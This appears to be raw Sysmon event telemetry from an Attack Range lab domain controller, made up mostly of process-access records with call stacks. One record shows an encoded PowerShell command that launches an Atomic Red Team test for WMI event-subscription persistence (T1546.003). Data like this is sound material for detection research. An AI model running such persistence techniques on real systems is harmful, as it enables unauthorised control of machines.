13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004590Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A3-5FCF-E800-000000009101}4612C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004589Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004588Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.206{10ACEC4A-85A2-5FCF-E700-000000009101}25604296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A3-5FCF-E800-000000009101}4612C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66db258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253415(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64) 154100x80000000000000004587Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.221{10ACEC4A-85A3-5FCF-E800-000000009101}4612C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000005162Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.689{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005161Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.689{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005160Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.689{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005159Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.673{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005158Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.673{10ACEC4A-853E-5FCF-0A00-000000009101}852936C:\Windows\system32\services.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005157Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.658{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005156Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.658{10ACEC4A-853E-5FCF-0A00-000000009101}8521288C:\Windows\system32\services.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005155Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.658{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005154Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005153Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005152Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.642{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005151Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005150Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5fbdb|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005149Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.642{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005148Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005147Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005146Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 